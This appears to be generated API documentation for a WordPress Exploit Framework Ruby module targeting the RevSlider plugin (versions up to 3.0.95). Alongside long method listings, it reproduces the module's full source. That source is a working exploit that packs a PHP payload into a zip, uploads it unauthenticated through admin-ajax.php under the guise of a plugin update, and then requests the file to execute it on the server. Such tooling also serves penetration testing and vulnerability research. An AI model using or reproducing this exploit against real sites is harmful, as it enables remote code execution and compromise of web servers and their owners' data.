Class: Wpxf::Exploit::RevsliderShellUpload

Inherits:
Module
  • Object
show all
Includes:
Wpxf
Defined in:
lib/wpxf/modules/exploit/shell/revslider_shell_upload.rb

Constant Summary

Constants included from WordPress::Options

WordPress::Options::WP_OPTION_CONTENT_DIR

Constants included from Net::HttpOptions

Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST

Instance Attribute Summary

Attributes inherited from Module

#active_workspace, #event_emitter, #payload, #session_cookie

Attributes included from Options

#datastore, #options

Instance Method Summary collapse

Methods included from Wpxf

app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version

Methods inherited from Module

#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option

Methods included from Db::Credentials

#store_credentials

Methods included from ModuleAuthentication

#authenticate_with_wordpress, #requires_authentication

Methods included from WordPress::Urls

#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc

Methods included from WordPress::Options

#wp_content_dir

Methods included from WordPress::Login

#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body

Methods included from WordPress::Fingerprint

#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version

Methods included from Net::HttpClient

#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri

Methods included from Net::TyphoeusHelper

#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options

Methods included from Net::UserAgent

#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent

Methods included from Versioning::OSVersions

#random_nt_version, #random_osx_version

Methods included from Versioning::BrowserVersions

#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version

Methods included from Options

#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option

Methods included from OutputEmitters

#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning

Methods included from ModuleInfo

#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info

Constructor Details

#initializeRevsliderShellUpload

Returns a new instance of RevsliderShellUpload.



6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
 
# File 'lib/wpxf/modules/exploit/shell/revslider_shell_upload.rb', line 6

def initialize
  super

  update_info(
    name: 'RevSlider <= 3.0.95 Shell Upload',
    desc: 'This module exploits a file upload vulnerability in versions '\
          '<= 3.0.95 of the RevSlider plugin which '\
          'allows unauthenticated users to upload and execute PHP scripts '\
          'in the context of the web server.',
    author: [
      'Simo Ben youssef', # Vulnerability discovery
      'rastating'         # WPXF module
    ],
    references: [
      ['EDB', '35385'],
      ['WPVDB', '7954'],
      ['URL', 'https://whatisgon.wordpress.com/2014/11/30/another-revslider-vulnerability/']
    ],
    date: 'Nov 26 2014'
  )
end

Instance Method Details

#checkObject 



28
29
30
31
32
 
# File 'lib/wpxf/modules/exploit/shell/revslider_shell_upload.rb', line 28

def check
  pattern = /^\s*(?:version)\s*(\d{1,2}\.\d{1,2}(?:\.\d{1,2})?).*$/mi
  release_log_url = normalize_uri(plugin_url, 'release_log.txt')
  check_version_from_custom_file(release_log_url, pattern, '3.0.96')
end

#payload_body_builder(payload_name) ⇒ Object 



38
39
40
41
42
43
44
45
 
# File 'lib/wpxf/modules/exploit/shell/revslider_shell_upload.rb', line 38

def payload_body_builder(payload_name)
  builder = Utility::BodyBuilder.new
  zip_fields = { "revslider/#{payload_name}" => payload.encoded }
  builder.add_zip_file('update_file', zip_fields, 'revslider.zip')
  builder.add_field('action', 'revslider_ajax_action')
  builder.add_field('client_action', 'update_plugin')
  builder
end

#plugin_urlObject 



34
35
36
 
# File 'lib/wpxf/modules/exploit/shell/revslider_shell_upload.rb', line 34

def plugin_url
  normalize_uri(wordpress_url_plugins, 'revslider')
end

#runObject 



51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
 
# File 'lib/wpxf/modules/exploit/shell/revslider_shell_upload.rb', line 51

def run
  super
  return false unless check_wordpress_and_online

  emit_info 'Preparing payload...'
  payload_name = "#{Utility::Text.rand_alpha(rand(5..10))}.php"
  builder = payload_body_builder(payload_name)

  emit_info 'Uploading payload...'
  res = nil
  builder.create do |body|
    res = execute_post_request(url: wordpress_url_admin_ajax, body: body)
  end

  if res.nil? || res.timed_out?
    emit_error 'No response from the target'
    return false
  end

  if res.code != 200
    emit_info "Response code: #{res.code}", true
    emit_info "Response body: #{res.body}", true
    emit_error 'Failed to upload payload'
    return false
  end

  if res.body =~ /^0$/
    emit_error 'Target not vulnerable or the plugin is deactivated'
    return false
  end

  payload_url = normalize_uri(upload_folder, payload_name)
  emit_success "Uploaded the payload to #{payload_url}", true

  emit_info 'Executing the payload...'
  res = execute_get_request(url: payload_url)
  if res && res.code == 200 && !res.body.strip.empty?
    emit_success "Result: #{res.body}"
  end

  return true
end

#upload_folderObject 



47
48
49
 
# File 'lib/wpxf/modules/exploit/shell/revslider_shell_upload.rb', line 47

def upload_folder
  normalize_uri(plugin_url, 'temp', 'update_extract', 'revslider')
end